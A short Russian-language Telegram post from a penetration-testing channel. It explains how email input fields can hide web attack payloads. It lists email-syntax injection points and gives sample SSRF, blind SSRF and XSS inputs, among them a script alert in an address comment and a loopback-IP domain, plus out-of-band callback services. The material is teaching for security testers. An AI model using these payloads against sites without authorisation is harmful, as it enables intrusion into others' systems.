TGViewer
Что-то на пентестерском Что-то на пентестерском @pntests · 2.78K subscribers
Post #62 3.07K
Атаки на механизм E-mail ⛈

Сегодня помог друзьям их сайт пентестить и нашел blind ssrf, xss, обычный ssrf в одной email форме
И хочу поделится как находить такое, т.к. часто в вебе есть форма email

➡️Мыло имеет свою валидацию
Примеры как можно писать:
🟢 keklol@"payload"test.com
🟢 keklol@test.com(payload)
🟢 keklol(payload)@test.com
🟢 keklol@[payload]
🟢 keklol@(payload)test.com
🟢 "payload"@test.com

➡️ Валидность можно проверить тута

🟢Blind SSRF: keklol@сюда ссылку барп коллабратора
🟢SSRF: keklol@[127.0.0.1]
🟢XSS: keklol@test(<script>alert(0)</script>).com

➡️ Нет Burp Collabrator'a 🤬
Аналоги:
🟢https://canarytokens.org
🟢https://webhook.site
🟢https://app.interactsh.com
🟢https://hookdeck.com

📌 Больше техник и уязвимостей с механизмом мыла можно глянуть в этой презентации от баунти-хантера ссылка
И в видосе ссылка

ЧТНП | #web
  • 🔥 18
  • 👍 4
  • ❤‍🔥 1
More from @pntests
  1. Dec 31, 2025С новым годом 🎉🎊🎆🍾🎄🎁
  2. Aug 10, 2025James Kettle дропнул свой ресерч про новые классы атак через HTTP Request Smuggling и, к м…
  3. Jul 14, 2025🛡 Application Attack Matrix — созданная сообществом MITRE-подобная матрица тактик, техник…
  4. Jun 18, 2025Успейте подать заявку на Pentest Award 2025 до 30 июня! Это отраслевая награда для специал…
  5. Jun 8, 2025Post #191
  6. Jun 8, 2025⛈Небезопасная генерация токена Что может быть проще: сброс пароля, подтверждение почты или…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →